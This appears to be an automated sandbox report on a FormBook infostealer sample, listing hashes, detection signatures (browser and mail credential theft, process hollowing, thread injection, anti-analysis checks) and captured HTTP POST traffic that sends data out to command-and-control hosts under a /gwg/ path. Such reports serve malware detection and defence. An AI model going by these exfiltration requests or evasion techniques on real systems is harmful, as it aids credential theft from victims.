Analysis Report 11-27.exe

Overview

General Information

Sample Name:	11-27.exe
Analysis ID:	324075
MD5:	4312f55eb22b6cd52d0f6f93f40215af
SHA1:	a0439365d1f3e47d03729760aaaafd5f10991d53
SHA256:	4b5650a097c6a9ee7bc32fb5aa691ce1d1f358bcbdcbccfc6ba66d2f76f612af
Tags:	exe
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected FormBook malware

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Steal Google chrome login data

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Sigma detected: Suspicious Svchost Process

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file access)

Uses netstat to query active network connections and open ports

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains strange resources

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Keylogger Generic

Yara signature match

Classification

Signatures

AV Detection:

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe

ReversingLabs: Detection: 68%

Multi AV Scanner detection for submitted file

Source: 11-27.exe	Virustotal: Detection: 28%			Perma Link
Source: 11-27.exe	ReversingLabs: Detection: 68%

Yara detected FormBook

Source: Yara match	File source: 00000007.00000002.411551664.0000000000450000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.420984310.0000000003280000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.433927782.0000000003290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.420714851.00000000030C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.433471345.0000000003000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.421063196.00000000032B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.606704866.0000000002A90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.436004947.00000000051EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.416656811.00000000032A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.416715788.00000000032D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.419388564.00000000051EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.433805167.0000000003260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.604691451.00000000002E0000.00000004.00000001.sdmp, type: MEMORY

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 11-27.exe

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 5.2.Hmptdrv.exe.2e50000.4.unpack	Avira: Label: TR/Hijacker.Gen
Source: 2.2.Hmptdrv.exe.3230000.5.unpack	Avira: Label: TR/Hijacker.Gen
Source: 0.2.11-27.exe.2e80000.5.unpack	Avira: Label: TR/Hijacker.Gen

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\11-27.exe	Code function: 4x nop then mov eax, dword ptr [00460BCCh]	0_3_02B2896C
Source: C:\Users\user\Desktop\11-27.exe	Code function: 4x nop then mov eax, ecx	0_3_02B28C98
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	Code function: 4x nop then mov eax, dword ptr [00460BCCh]	5_3_02AF896C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	Code function: 4x nop then mov eax, ecx	5_3_02AF8C98
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 4x nop then pop edi	6_2_02AA6CB7
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 4x nop then pop edi	6_2_02AA7D8D
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 4x nop then pop edi	7_2_00467D8D

Networking:

Uses netstat to query active network connections and open ports

Source: unknown

Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /gwg/?1bj=jlNDBdXxM&pPU=lb/SWHpKCmsmK+u5QR6+71VT1RCMiNBNQ95QwlYjM9FeW5Wl/GojsaK+wOwJlCTaA7k0MtpWEA== HTTP/1.1Host: www.systemmigrationservices.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 162.159.136.232 162.159.136.232
Source: Joe Sandbox View	IP Address: 162.159.130.233 162.159.130.233

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: SINGLEHOP-LLCUS SINGLEHOP-LLCUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: ce5f3254611a8c095a3d821d44539877

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /gwg/ HTTP/1.1Host: www.horne-construction.comConnection: closeContent-Length: 413Cache-Control: no-cacheOrigin: http://www.horne-construction.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.horne-construction.com/gwg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 70 50 55 3d 68 72 67 59 4d 66 52 41 31 76 28 4b 4e 52 38 4b 52 42 4b 44 33 54 79 6e 39 71 58 72 76 56 7e 53 43 6f 42 2d 55 4c 46 75 6b 4a 38 54 52 68 35 5f 56 34 58 52 35 6f 4a 6c 45 35 39 64 52 67 77 66 45 49 7a 36 74 66 4c 74 4d 41 41 51 7a 68 58 4e 48 78 36 4b 34 45 64 44 64 32 4e 74 73 5f 46 45 55 46 44 34 68 4a 55 7a 5a 6b 70 74 4b 58 74 4b 71 73 68 51 53 64 77 61 77 66 36 6f 6f 78 30 34 6c 67 31 78 53 34 35 76 79 35 61 4c 68 38 51 52 44 41 45 33 42 41 43 45 49 4f 62 36 37 69 33 46 4a 59 6d 44 41 2d 46 61 6b 4f 30 7a 73 44 66 46 30 6a 49 46 41 42 6a 52 69 43 39 79 45 43 47 6b 45 45 36 4b 42 63 6b 48 52 4e 44 6b 79 71 34 5a 6d 77 66 45 79 4f 71 63 77 6d 6d 64 43 4a 33 50 76 48 62 5a 63 64 68 38 6e 61 76 7a 78 6e 6c 43 6b 6b 6b 55 65 72 68 6e 6d 77 56 69 67 6e 4b 39 66 37 37 2d 58 42 57 43 7a 68 28 7a 46 62 78 77 43 6b 6c 31 67 54 78 45 6a 4c 6b 6b 61 74 43 61 75 38 57 46 33 46 35 4f 62 62 49 6e 71 37 30 70 28 36 52 4e 62 79 58 30 65 72 64 44 6b 67 54 72 58 47 33 6a 37 74 77 5a 73 48 74 6f 79 36 6c 6f 67 6e 7a 4e 39 32 62 32 4f 55 54 49 39 67 74 44 6a 46 77 76 4c 76 54 43 59 56 4d 66 50 51 32 66 78 6d 70 57 35 6c 61 4f 57 52 33 56 66 6a 49 7a 36 4d 53 38 77 6d 39 78 64 37 6e 42 33 32 59 75 48 79 6d 51 74 37 55 2e 00 00 00 00 00 00 00 00 Data Ascii: pPU=hrgYMfRA1v(KNR8KRBKD3Tyn9qXrvV~SCoB-ULFukJ8TRh5_V4XR5oJlE59dRgwfEIz6tfLtMAAQzhXNHx6K4EdDd2Nts_FEUFD4hJUzZkptKXtKqshQSdwawf6oox04lg1xS45vy5aLh8QRDAE3BACEIOb67i3FJYmDA-FakO0zsDfF0jIFABjRiC9yECGkEE6KBckHRNDkyq4ZmwfEyOqcwmmdCJ3PvHbZcdh8navzxnlCkkkUerhnmwVignK9f77-XBWCzh(zFbxwCkl1gTxEjLkkatCau8WF3F5ObbInq70p(6RNbyX0erdDkgTrXG3j7twZsHtoy6lognzN92b2OUTI9gtDjFwvLvTCYVMfPQ2fxmpW5laOWR3VfjIz6MS8wm9xd7nB32YuHymQt7U.
Source: global traffic	HTTP traffic detected: POST /gwg/ HTTP/1.1Host: www.horne-construction.comConnection: closeContent-Length: 150725Cache-Control: no-cacheOrigin: http://www.horne-construction.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.horne-construction.com/gwg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 70 50 55 3d 68 72 67 59 4d 62 4d 7a 79 66 37 66 4a 6a 59 4a 44 79 79 4c 7a 51 36 35 35 72 33 34 6d 6c 57 67 42 5f 51 37 55 4b 30 47 70 74 34 65 57 41 70 5f 54 39 37 57 77 6f 4a 6d 55 4a 39 53 41 51 4d 4e 65 66 33 49 74 65 4f 6c 4d 41 49 54 6c 58 54 4d 48 68 36 6e 37 6b 41 77 66 33 74 71 73 39 77 6b 46 6a 36 2d 6b 4a 6f 7a 63 51 4e 38 45 53 42 52 74 70 5a 50 51 70 70 51 32 65 53 4c 6f 43 41 4d 69 7a 49 6b 52 35 31 68 6c 65 6e 48 6b 38 68 34 48 54 6b 30 65 67 6d 44 4c 4a 4c 70 28 44 72 42 4b 63 53 4c 46 5f 46 5a 37 75 73 31 72 42 48 6a 69 69 38 53 47 52 54 46 69 46 42 49 65 6c 71 35 56 57 4f 43 45 74 5a 69 4a 73 33 6d 7e 39 55 52 69 7a 33 32 77 50 61 7a 79 6e 32 43 52 6f 66 61 6a 6b 69 53 66 38 6f 43 67 76 66 33 36 32 55 33 6c 58 49 4d 42 34 4a 49 68 7a 45 34 71 58 71 6c 63 35 33 4d 59 42 57 68 31 68 28 5f 4c 37 42 49 48 58 4a 75 72 69 41 6b 71 71 74 6a 41 70 79 5a 70 2d 65 46 7a 67 56 4c 65 71 38 56 6b 76 35 55 76 4c 46 4b 62 6c 6e 58 66 72 63 5a 76 45 72 6b 58 47 32 59 37 70 6b 7a 76 57 35 6f 7a 76 6f 30 68 41 66 42 37 32 62 72 43 6b 44 57 7a 77 52 54 6a 46 34 76 4c 66 6a 6f 5a 6e 73 66 45 53 7e 51 78 48 70 57 30 31 61 4f 64 78 32 4e 52 6a 42 59 35 64 6a 6b 33 6a 39 73 45 72 54 6f 77 45 78 43 63 42 7e 58 7a 4c 34 33 30 6c 42 46 69 69 47 41 42 65 39 48 62 4d 32 74 39 76 4d 51 6a 4d 59 79 73 66 41 59 47 45 41 56 54 7a 4b 56 77 58 73 55 51 69 65 4d 44 55 4c 68 78 63 47 53 41 6e 62 33 53 75 46 34 7a 5a 34 51 69 53 74 71 7a 6e 53 4d 69 37 48 55 6c 4b 63 4d 70 41 38 64 4a 59 68 5f 43 53 45 77 6e 37 53 6c 39 62 57 61 33 5f 78 33 75 39 33 61 6a 6f 31 33 7e 79 65 2d 78 64 4c 4c 6d 59 30 4f 53 64 42 68 50 50 74 51 64 69 30 58 73 4d 6c 57 69 66 5a 58 4a 48 68 33 42 64 6d 36 62 58 45 5a 78 74 4f 41 7a 37 32 31 76 39 63 5f 61 43 39 79 68 4a 69 45 4d 73 53 43 75 50 65 6d 41 69 74 75 4a 75 6e 52 28 68 68 67 67 7a 37 69 76 31 63 52 42 66 28 61 37 32 77 6d 32 5f 78 56 6c 6a 35 34 57 4e 50 50 78 75 63 69 42 6c 75 6a 43 6e 46 37 64 61 4e 77 7a 66 71 70 71 5a 6c 79 35 52 4c 72 70 6c 64 57 4e 41 36 63 54 75 52 71 74 4d 53 47 37 6d 6c 48 35 72 53 41 6e 55 5a 4d 4e 30 5a 44 64 6f 55 53 5a 6c 7a 69 7a 44 47 68 6e 39 63 47 30 59 63 32 45 30 36 50 53 5a 41 38 4c 79 49 61 68 47 4c 78 4d 4c 4e 44 32 69 7e 53 69 49 6a 46 79 41 30 55 56 31 71 79 6d 67 4b 62 6b 6d 32 76 56 42 75 65 68 32 55 33 71 34 46 70 66 42 64 77 70 7a 6c 75 5a 58 75 35 69 58 78 33 76 68 51 37 43 70 6d 71 6a 31 47 79 49 6b 56 4c 49 33 33 4e 59 76 57 59 63 49 36 72 56 38 45 6d 5a 46 33 64 73 6b 76 4e 55 50 4f 51 44 37 56 5a 74 66 6b 67 44 51 6e 61 6f 73 44 64 30 50 33 79 68 51 7e 42 7
Source: global traffic	HTTP traffic detected: POST /gwg/ HTTP/1.1Host: www.systemmigrationservices.comConnection: closeContent-Length: 413Cache-Control: no-cacheOrigin: http://www.systemmigrationservices.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.systemmigrationservices.com/gwg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 70 50 55 3d 74 35 7a 6f 49 6e 4e 5f 65 33 34 6f 59 70 62 4b 4e 30 50 37 37 43 68 33 77 6a 7e 71 70 4e 55 47 55 49 63 54 70 33 30 46 63 59 49 5a 45 36 37 68 7a 6b 41 37 6d 61 44 6e 72 50 67 58 30 78 6a 65 48 37 6c 76 4a 65 56 34 46 66 7e 4c 33 54 78 41 57 33 33 56 51 62 28 46 4f 59 74 58 44 32 32 55 57 6f 72 78 4a 6e 68 75 53 67 4a 4f 74 41 4d 7a 70 49 6a 35 58 54 36 4f 6e 57 72 37 30 76 55 4c 4f 63 52 64 4d 45 32 78 4c 4c 7e 61 38 66 33 4d 77 4a 57 41 79 47 7a 61 6a 42 36 55 62 76 67 6c 56 36 5a 56 76 72 4b 47 48 6f 41 6d 4d 38 6d 45 55 52 6c 5f 51 57 43 32 53 78 31 39 47 55 7a 6d 6c 55 79 76 78 4c 57 47 59 65 51 4b 52 76 36 73 32 48 4b 76 73 79 58 52 71 49 47 65 43 7a 36 65 70 39 32 4b 61 4e 38 46 70 71 62 35 77 49 32 37 72 75 49 49 42 67 55 76 39 52 75 6d 7e 48 79 36 28 64 43 42 78 6d 39 30 76 48 4a 53 50 69 61 58 79 36 51 71 43 4d 4e 5f 28 43 62 52 7a 55 33 54 64 53 75 4c 45 46 31 39 69 72 59 4e 28 6c 6b 4c 6a 6e 6f 6b 28 68 73 79 44 4e 69 56 49 73 49 35 6d 78 4a 56 4f 32 75 4e 48 6b 4f 65 54 2d 79 71 6d 66 6c 57 79 54 62 45 79 58 35 4e 6c 6d 67 32 55 78 44 34 4d 52 51 37 4c 5a 53 48 55 4a 6f 48 71 44 65 6c 46 33 72 7a 77 63 69 6b 4c 61 56 6e 7e 73 4b 4f 56 50 68 30 39 74 66 34 49 61 42 42 59 5f 36 74 44 5a 63 2e 00 00 00 00 00 00 00 00 Data Ascii: pPU=t5zoInN_e34oYpbKN0P77Ch3wj~qpNUGUIcTp30FcYIZE67hzkA7maDnrPgX0xjeH7lvJeV4Ff~L3TxAW33VQb(FOYtXD22UWorxJnhuSgJOtAMzpIj5XT6OnWr70vULOcRdME2xLL~a8f3MwJWAyGzajB6UbvglV6ZVvrKGHoAmM8mEURl_QWC2Sx19GUzmlUyvxLWGYeQKRv6s2HKvsyXRqIGeCz6ep92KaN8Fpqb5wI27ruIIBgUv9Rum~Hy6(dCBxm90vHJSPiaXy6QqCMN_(CbRzU3TdSuLEF19irYN(lkLjnok(hsyDNiVIsI5mxJVO2uNHkOeT-yqmflWyTbEyX5Nlmg2UxD4MRQ7LZSHUJoHqDelF3rzwcikLaVn~sKOVPh09tf4IaBBY_6tDZc.
Source: global traffic	HTTP traffic detected: POST /gwg/ HTTP/1.1Host: www.systemmigrationservices.comConnection: closeContent-Length: 150725Cache-Control: no-cacheOrigin: http://www.systemmigrationservices.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.systemmigrationservices.com/gwg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 70 50 55 3d 74 35 7a 6f 49 69 78 72 59 58 38 31 66 63 72 4c 4d 6b 66 6a 73 79 51 70 79 55 75 35 67 5f 46 33 4b 72 5a 59 70 32 45 4a 46 4d 46 65 58 71 4c 68 31 6e 6f 32 6f 61 44 6b 74 50 67 55 6c 68 76 49 5a 63 67 69 4a 66 68 65 46 66 6d 49 73 68 70 46 53 33 33 43 52 36 44 39 66 6f 52 41 44 30 7a 38 59 71 6d 69 44 48 74 75 63 32 68 4d 69 46 51 73 68 70 28 36 4e 44 6d 50 30 58 44 2d 30 38 52 2d 4f 2d 74 46 50 46 36 6b 42 64 4f 52 7a 5f 48 6b 36 36 47 46 74 43 62 5a 73 67 69 48 47 63 45 68 5a 62 59 31 7a 2d 7e 46 5a 6f 59 67 47 62 44 78 53 67 68 57 53 46 61 49 53 32 42 74 59 46 50 7a 32 43 32 33 32 5f 47 5f 54 4b 67 45 66 2d 36 6b 79 42 65 53 71 79 6e 75 31 37 53 37 49 44 58 63 39 5a 47 61 48 38 55 58 75 62 6e 31 6f 70 47 50 72 35 51 41 65 51 6c 4e 78 79 65 39 6e 45 71 69 38 66 75 33 31 32 38 53 70 48 4a 4f 48 41 79 6a 28 76 41 68 4a 38 63 76 67 78 37 50 35 6e 44 6f 4e 41 6d 4c 4a 42 70 70 6b 61 4d 37 31 30 55 6a 7a 57 39 71 7e 7a 78 53 52 64 69 55 62 2d 67 69 6d 78 4a 33 4f 79 37 51 47 52 6d 65 54 76 53 48 69 38 4e 43 7e 44 61 42 78 48 70 4c 7e 46 30 6d 55 78 4c 34 4e 6b 55 52 61 36 79 48 44 76 55 49 71 6e 4b 6c 43 48 72 7a 72 4d 6a 78 45 49 67 71 79 74 62 4f 64 4e 70 6c 73 66 66 47 50 71 4d 64 66 4e 32 6d 55 74 67 68 62 4e 39 76 37 58 78 77 77 38 7e 67 72 6e 49 4c 68 59 37 71 31 4d 32 73 42 66 6b 6e 42 4b 68 52 4a 64 62 31 59 6f 4e 6c 43 4a 75 33 74 53 52 71 42 36 74 6f 72 79 41 65 6b 43 42 7a 68 37 7e 4a 59 63 4c 68 45 78 34 73 51 42 5a 49 6d 71 6c 34 63 4d 4b 34 63 4b 6b 41 48 37 65 32 50 75 41 43 58 4b 67 34 76 33 7a 56 69 47 57 44 33 2d 62 36 44 64 38 79 59 65 7e 30 52 4f 37 63 70 53 46 62 43 46 55 50 68 39 52 78 4d 58 52 7a 4e 53 5a 75 54 41 6d 59 53 45 6c 62 4c 31 6e 55 63 75 41 4b 71 65 31 42 4b 56 74 50 4c 6e 79 78 6e 5a 32 54 58 74 4a 4b 72 46 6a 34 62 4d 51 73 43 77 61 67 43 35 37 4a 45 74 6b 33 46 49 70 48 58 32 34 37 72 36 78 39 58 69 4c 43 6c 73 73 6e 44 38 7e 69 31 49 7e 6c 47 75 50 6c 65 39 42 7a 41 59 39 64 51 32 32 47 61 30 67 5f 4a 63 77 73 31 36 44 6e 66 56 5a 6f 32 49 71 48 68 4b 6d 67 45 42 45 65 56 61 6a 30 4c 35 6a 64 71 6f 51 66 54 73 6d 34 52 57 72 78 70 44 6b 33 77 61 4b 65 4e 58 4a 34 54 54 28 33 68 5f 48 50 6a 7a 72 67 68 4e 6a 74 50 4b 38 59 72 46 73 4c 6e 64 71 79 63 71 45 72 33 30 59 75 71 59 44 5f 7e 56 50 4e 4a 35 42 4c 53 5a 74 2d 61 49 68 31 42 39 32 63 47 6a 71 4c 31 6e 35 63 61 57 74 76 63 4c 59 55 55 74 7e 59 41 33 41 68 7a 61 4b 47 37 55 35 35 31 31 56 66 45 37 4e 75 30 64 37 53 46 48 55 4e 31 38 30 38 59 53 6d 6c 4e 65 4a 65 61 63 44 72 30 64 73 47 6d 41 37 50 38 5f 78 6

Source: global traffic

Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)

Source: unknown

DNS traffic detected: queries for: discord.com

Source: unknown

HTTP traffic detected: POST /gwg/ HTTP/1.1Host: www.horne-construction.comConnection: closeContent-Length: 413Cache-Control: no-cacheOrigin: http://www.horne-construction.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.horne-construction.com/gwg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 70 50 55 3d 68 72 67 59 4d 66 52 41 31 76 28 4b 4e 52 38 4b 52 42 4b 44 33 54 79 6e 39 71 58 72 76 56 7e 53 43 6f 42 2d 55 4c 46 75 6b 4a 38 54 52 68 35 5f 56 34 58 52 35 6f 4a 6c 45 35 39 64 52 67 77 66 45 49 7a 36 74 66 4c 74 4d 41 41 51 7a 68 58 4e 48 78 36 4b 34 45 64 44 64 32 4e 74 73 5f 46 45 55 46 44 34 68 4a 55 7a 5a 6b 70 74 4b 58 74 4b 71 73 68 51 53 64 77 61 77 66 36 6f 6f 78 30 34 6c 67 31 78 53 34 35 76 79 35 61 4c 68 38 51 52 44 41 45 33 42 41 43 45 49 4f 62 36 37 69 33 46 4a 59 6d 44 41 2d 46 61 6b 4f 30 7a 73 44 66 46 30 6a 49 46 41 42 6a 52 69 43 39 79 45 43 47 6b 45 45 36 4b 42 63 6b 48 52 4e 44 6b 79 71 34 5a 6d 77 66 45 79 4f 71 63 77 6d 6d 64 43 4a 33 50 76 48 62 5a 63 64 68 38 6e 61 76 7a 78 6e 6c 43 6b 6b 6b 55 65 72 68 6e 6d 77 56 69 67 6e 4b 39 66 37 37 2d 58 42 57 43 7a 68 28 7a 46 62 78 77 43 6b 6c 31 67 54 78 45 6a 4c 6b 6b 61 74 43 61 75 38 57 46 33 46 35 4f 62 62 49 6e 71 37 30 70 28 36 52 4e 62 79 58 30 65 72 64 44 6b 67 54 72 58 47 33 6a 37 74 77 5a 73 48 74 6f 79 36 6c 6f 67 6e 7a 4e 39 32 62 32 4f 55 54 49 39 67 74 44 6a 46 77 76 4c 76 54 43 59 56 4d 66 50 51 32 66 78 6d 70 57 35 6c 61 4f 57 52 33 56 66 6a 49 7a 36 4d 53 38 77 6d 39 78 64 37 6e 42 33 32 59 75 48 79 6d 51 74 37 55 2e 00 00 00 00 00 00 00 00 Data Ascii: pPU=hrgYMfRA1v(KNR8KRBKD3Tyn9qXrvV~SCoB-ULFukJ8TRh5_V4XR5oJlE59dRgwfEIz6tfLtMAAQzhXNHx6K4EdDd2Nts_FEUFD4hJUzZkptKXtKqshQSdwawf6oox04lg1xS45vy5aLh8QRDAE3BACEIOb67i3FJYmDA-FakO0zsDfF0jIFABjRiC9yECGkEE6KBckHRNDkyq4ZmwfEyOqcwmmdCJ3PvHbZcdh8navzxnlCkkkUerhnmwVignK9f77-XBWCzh(zFbxwCkl1gTxEjLkkatCau8WF3F5ObbInq70p(6RNbyX0erdDkgTrXG3j7twZsHtoy6lognzN92b2OUTI9gtDjFwvLvTCYVMfPQ2fxmpW5laOWR3VfjIz6MS8wm9xd7nB32YuHymQt7U.

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Type: text/html; charset=UTF-8Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://horne-construction.com/wp-json/>; rel="https://api.w.org/"Transfer-Encoding: chunkedContent-Encoding: gzipVary: Accept-EncodingDate: Sat, 28 Nov 2020 09:25:59 GMTServer: LiteSpeedData Raw: 66 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc 3b d9 72 db 38 b6 cf f1 57 c0 4c c5 96 a6 49 48 96 d7 c8 96 7b 32 ee 74 dd 5b d5 9d 4c 65 79 4a 5c 2a 88 3c a2 d0 01 01 36 00 6a 29 c7 ff 7e 0b e0 4e 51 8b dd c9 cb cd 8b 45 e0 ac c0 d9 c9 dc 1c 06 c2 d7 ab 18 d0 4c 47 ec f6 e0 c6 fc 41 8c f0 70 e4 00 f7 3e 7f 74 cc 1a 90 e0 f6 e0 c5 4d 04 9a 20 7f 46 a4 02 3d 72 3e 7f fa dd bb 72 8a 75 4e 22 18 39 73 0a 8b 58 48 ed 20 5f 70 0d 5c 8f 9c 05 0d f4 6c 14 c0 9c fa e0 d9 07 17 51 4e 35 25 cc 53 3e 61 30 3a b1 54 18 e5 df 90 04 36 72 62 29 a6 94 81 83 66 12 a6 23 67 a6 75 ac 86 bd 5e 18 c5 21 16 32 ec 2d a7 bc 77 62 90 0e 5e dc 68 aa 19 dc fe 97 84 80 b8 d0 68 2a 12 1e a0 a3 97 57 83 93 93 6b f4 3f ef 3f bc 7b 8b ee de bf fb f8 e9 c3 e7 bb 4f ff fb fe dd 4d 2f 45 38 b8 29 d8 1d 07 5c 79 b1 84 29 68 7f 76 9c f2 3c ee f5 66 42 72 f0 7c c1 95 96 89 af a9 e0 d8 17 d1 31 ea dd ee c6 9d 0a ae 15 0e 85 08 19 90 98 aa fd 31 15 5e 18 15 1b 6c 1c c2 34 48 4e 34 38 c8 5c d6 c8 21 71 cc a8 4f 8c 58 3d a9 d4 2f cb 88 39 c8 aa 36 72 d6 b5 46 47 92 fc 9d 88 6b f4 3b 40 50 3d d6 e1 26 3d 7b 53 80 a0 e7 d4 b5 fd 61 62 dc 89 28 02 ae d5 13 e4 f1 33 94 8a 60 2f 5e dc 28 5f d2 58 67 67 a2 61 a9 7b 7f 91 39 49 57 8d 51 bd 78 b1 a0 3c 10 0b 3c 5e c4 10 89 bf e8 47 d0 9a f2 50 a1 11 7a 70 26 44 c1 67 c9 9c 61 66 62 5f 7b 5f 7b d9 05 7c ed d1 88 84 a0 be f6 7c 21 e1 6b cf 22 7f ed 9d 0c 70 1f f7 bd 93 af bd cb c1 f2 72 f0 b5 e7 b8 0e 2c b5 33 74 70 cc 43 c7 75 d4 3c 7c 2e 45 35 0f 2d 3d 35 0f df a6 24 d5 dc 92 14 89 f4 c1 19 3e 38 be e0 3e d1 56 94 4c e6 a1 11 b9 dd 52 bf f6 16 b1 47 b9 cf 92 c0 a8 f1 97 b2 0b 16 d9 93 c0 80 28 c0 11 e5 f8 2f f5 eb 1c e4 e8 1c 9f e1 33 e7 f1 f1 da 1c 5a ef 5f 87 e8 d3 8c 2a 64 dc 10 51 85 48 a2 85 17 02 07 49 34 04 e8 5f 3d 03 75 38 4d b8 75 8c 0e b8 c4 d5 dd 87 39 91 48 ba dc 15 2e 75 e3 11 c1 be 04 a2 e1 2d 03 73 d9 1d c7 27 7c 4e 94 d3 75 d5 28 c6 21 e8 3b 13 21 96 fa e8 a8 fa d4 71 06 81 d3 bd ce 49 23 bf 03 39 69 32 fa a8 25 e5 21 9e 4a 11 dd cd 88 bc 13 01 5c 2b ec 33 20 f2 03 f8 ba d3 77 fb 6e 8c d3 18 13 e3 19 d0 70 a6 bb ae c2 53 ca d8 27 58 ea 0e c1 c6 71 56 1d 3d a3 ca 85 ae db 77 fb dd 6b 2b f6 28 c6 5a fc 46 34 f9 fc e1 8f 4e f7 5a 82 4e 24 47 cf 27 ae 53 e2 ae 1c 8d ea a4 1f 0b d5 58 07 ba 0f 74 da 39 54 df bf 1f 96 42 76 53 de 87 27 d7 6a 41 b5 3f eb 28 6c 8e e9 3f 44 01 a3 1c 46 8e 16 b1 63 94 12 26 ba 5e f4 fb e8 74 10 2f d1 1b 49 09 73 5c e8 3e f8 44 81 33 65 24 74 86 19 29 bf f3 e5 64 70 f9 fa ea d2 bd 38 ef 9f be 76 af 06 fd 73 f7 f5 d5 eb f3 f4 f9 de 5d db 3e ad 6e 77 8f 8e 3a 87 7e e7 cb f9 f9 e9 f9 85 7b 7e 71 35 b8 70 8b df 27 af ef dd da

Source: explorer.exe, 00000001.00000000.370844122.0000000007890000.00000002.00000001.sdmp	String found in binary or memory: http://%s.com
